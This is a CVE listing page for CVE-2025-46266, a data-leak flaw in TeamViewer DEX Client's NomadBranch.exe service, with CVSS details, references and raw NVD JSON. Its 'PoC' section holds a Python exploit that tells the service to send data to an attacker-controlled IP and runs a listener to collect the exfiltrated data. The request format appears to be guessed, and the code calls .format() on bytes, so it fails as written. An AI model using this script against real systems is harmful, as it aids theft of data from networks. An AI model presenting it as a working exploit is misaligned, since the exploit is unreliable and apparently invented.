CVE-2025-46266

Description

A vulnerability in TeamViewer DEX Client (former 1E Client) - Content Distribution Service (NomadBranch.exe) prior version 25.11 for Windows allows malicious actors to coerce the service into transmitting data to an arbitrary internal IP address, potentially leaking sensitive information.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

TeamViewer DEX Client (NomadBranch.exe) < 25.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-46266 PoC - TeamViewer DEX Client NomadBranch.exe Data Exfiltration
# This PoC demonstrates forcing NomadBranch.exe to send data to an arbitrary internal IP

import socket
import struct
import requests

TARGET_IP = "192.168.1.100"  # Attacker-controlled internal IP
TARGET_PORT = 8080
NOMAD_BRANCH_PORT = 80  # Default NomadBranch service port

def create_malicious_request():
    """Create a malicious content distribution request targeting arbitrary IP"""
    # Malformed request that exploits lack of IP validation
    payload = {
        "action": "distribute",
        "target_ip": TARGET_IP,
        "target_port": TARGET_PORT,
        "data_type": "config",
        "compression": "none"
    }
    return payload

def send_exploit():
    """Send exploit to NomadBranch service"""
    try:
        # Connect to NomadBranch service
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(('127.0.0.1', NOMAD_BRANCH_PORT))
        
        # Send malicious request
        request = b"POST /api/distribute HTTP/1.1\r\n"
        request += b"Host: 127.0.0.1\r\n"
        request += b"Content-Type: application/json\r\n"
        request += b"X-Target-IP: {}\r\n".format(TARGET_IP).encode()
        request += b"X-Target-Port: {}\r\n".format(TARGET_PORT).encode()
        request += b"\r\n"
        request += str(create_malicious_request()).encode()
        
        sock.send(request)
        response = sock.recv(4096)
        sock.close()
        return response
    except Exception as e:
        return f"Exploit failed: {e}"

def start_listener():
    """Start listener to receive exfiltrated data"""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', TARGET_PORT))
    server.listen(5)
    print(f"[*] Listening on port {TARGET_PORT}")
    
    while True:
        client, addr = server.accept()
        print(f"[*] Received connection from {addr}")
        data = client.recv(4096)
        print(f"[*] Received data: {data}")
        client.close()

if __name__ == "__main__":
    print("CVE-2025-46266 PoC - TeamViewer DEX Client Exploitation")
    print("Usage: Run start_listener() in separate thread, then call send_exploit()")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-46266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-46266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-46266/
[4] VulDB https://vuldb.com/cve/CVE-2025-46266
[5] https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-46266", "sourceIdentifier": "[email protected]", "published": "2025-12-11T12:16:25.270", "lastModified": "2026-01-14T19:57:37.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in TeamViewer DEX Client (former 1E Client) - Content Distribution Service (NomadBranch.exe) prior version 25.11 for Windows allows malicious actors to coerce the service into transmitting data to an arbitrary internal IP address, potentially leaking sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.11", "matchCriteriaId": "8611FFE2-869F-435C-8FC2-8522C656D4EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}